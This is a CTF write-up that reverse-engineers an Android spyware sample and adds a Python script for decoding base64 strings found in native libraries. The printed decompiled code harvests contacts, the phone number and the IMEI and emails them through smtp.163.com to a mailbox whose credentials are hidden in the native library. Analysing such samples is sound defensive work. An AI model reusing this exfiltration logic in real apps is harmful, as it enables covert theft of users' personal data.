  • BUUCTF -- 相册 (Photo Album)

    Test file: https://www.lanzous.com/iaoj7qb

    Tracing the source

    Open the APK in jadx-gui and search for code containing "mail".

    Clearly, the sendMailByJavaMail function is the key function. Locate it:

    public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {
        if (!debug) {
            Mail m = new Mail(C0005C2.MAILUSER, C0005C2.MAILPASS);
            m.set_host(C0005C2.MAILHOST);
            m.set_port(C0005C2.PORT);
            m.set_debuggable(true);
            m.set_to(new String[]{mailto});
            m.set_from(C0005C2.MAILFROME);
            m.set_subject(title);
            m.setBody(mailmsg);
            try {
                if (m.send()) {
                    Log.i("IcetestActivity", "Email was sent successfully.");
                } else {
                    Log.i("IcetestActivity", "Email was sent failed.");
                }
            } catch (Exception e) {
                Log.e("MailApp", "Could not send email", e);
            }
        }
        return 1;
    }

    The function takes mailto as a parameter; this mailto is the value we need to find.

    Let's look for where this function is referenced:

    public class MailTask extends AsyncTask<Integer, Integer, String> {
        private String content;
        private Context context;

        public void run(String content2) {
            // Dump every contact as "name:number", one per line
            String notebooks = "";
            for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {
                notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\n";
            }
            // Victim's own phone number, falling back to a value parsed from the SMS body
            String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();
            if (tel == null || tel.equals("")) {
                tel = C0001A2.getNoteBook(content2).phoneNumber;
            }
            Sms getBFlag = C0001A2.getNoteBook(content2);
            // Exfiltrate the contact list by e-mail; the subject carries phone number and IMEI
            if (!C0001A2.isEmpty(notebooks)) {
                C0001A2.sendMailByJavaMail(C0005C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);
            }
        }
    }

    C0005C2.MAILSERVER is the mailbox we need; now find where it is defined:

    public class C0005C2 {
        public static final String CANCELNUMBER = "%23%2321%23";
        public static final String MAILFROME = Base64.decode(NativeMethod.m1m());
        public static final String MAILHOST = "smtp.163.com";
        public static final String MAILPASS = Base64.decode(NativeMethod.pwd());
        public static final String MAILSERVER = Base64.decode(NativeMethod.m1m());
        public static final String MAILUSER = Base64.decode(NativeMethod.m1m());
        public static final String MOVENUMBER = "**21*121%23";
        public static final String PORT = "25";
        public static final String date = "2115-11-1";
        public static final String phoneNumber = Base64.decode(NativeMethod.m2p());
    }

    MAILSERVER is the value returned by NativeMethod.m1m(), which is loaded from an external .so file, and then base64-decoded. So we only need to find the base64-encoded strings inside that .so file.

    Open in IDA

    Open the libcore.so file from the APK in IDA and look for the base64-encoded strings in the Strings window.

    After decoding them, the second one is the flag.

    get flag!
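    The Strings-window step above can be scripted for triage of any native library: pull out printable runs, keep the ones that are syntactically valid base64, and report only those that decode to printable text (hard-coded mail accounts, passwords and phone numbers tend to surface this way). The script below is an added example written for this writeup, not code from the CTF sample or from IDA; SAMPLE_SO is a constructed stand-in for the bytes of a .so file, and the e-mail address and password embedded in it are made up.

    ```python
    import base64
    import binascii
    import re

    # Constructed stand-in for a native library: an ELF-looking header, a few
    # plain strings, and two base64-encoded values of the kind the writeup
    # recovers from libcore.so. The encoded values here are invented.
    SAMPLE_SO = (
        b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
        + b"smtp.example.invalid\x00"
        + base64.b64encode(b"analyst@example.com") + b"\x00"  # stands in for m1m()
        + b"NativeMethod\x00"                                  # looks like base64 but is not
        + base64.b64encode(b"s3cret-pa55") + b"\x00"           # stands in for pwd()
        + b"libcore.so\x00"
        + b"\x00" * 16
    )

    # Only the base64 alphabet plus up to two '=' padding characters.
    BASE64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


    def strings(blob: bytes, min_len: int = 4) -> list:
        """Equivalent of `strings`: runs of printable ASCII of at least min_len bytes."""
        pattern = rb"[\x20-\x7e]{%d,}" % min_len
        return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


    def decode_base64_candidates(blob: bytes, min_len: int = 8) -> list:
        """Return (encoded, decoded) pairs for strings that are valid base64 and
        decode to printable ASCII. Alphabet-only tokens that happen to have a
        valid length (e.g. "NativeMethod") decode to binary junk and are dropped."""
        found = []
        for s in strings(blob, min_len):
            if not BASE64_RE.fullmatch(s.encode("ascii")):
                continue
            try:
                # validate=True rejects stray characters and bad padding/length
                raw = base64.b64decode(s, validate=True)
            except (binascii.Error, ValueError):
                continue
            if raw and all(0x20 <= b < 0x7F for b in raw):
                found.append((s, raw.decode("ascii")))
        return found


    if __name__ == "__main__":
        for encoded, decoded in decode_base64_candidates(SAMPLE_SO):
            print(f"{encoded!r:40} -> {decoded!r}")
    ```

    Run against a real library, replace SAMPLE_SO with `open("libcore.so", "rb").read()`; the printable-output filter is what keeps ordinary identifiers such as "NativeMethod" from showing up as false positives.
    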

    flag{18218465125@163.com}

  • Original article: https://www.cnblogs.com/Mayfly-nymph/p/12578463.html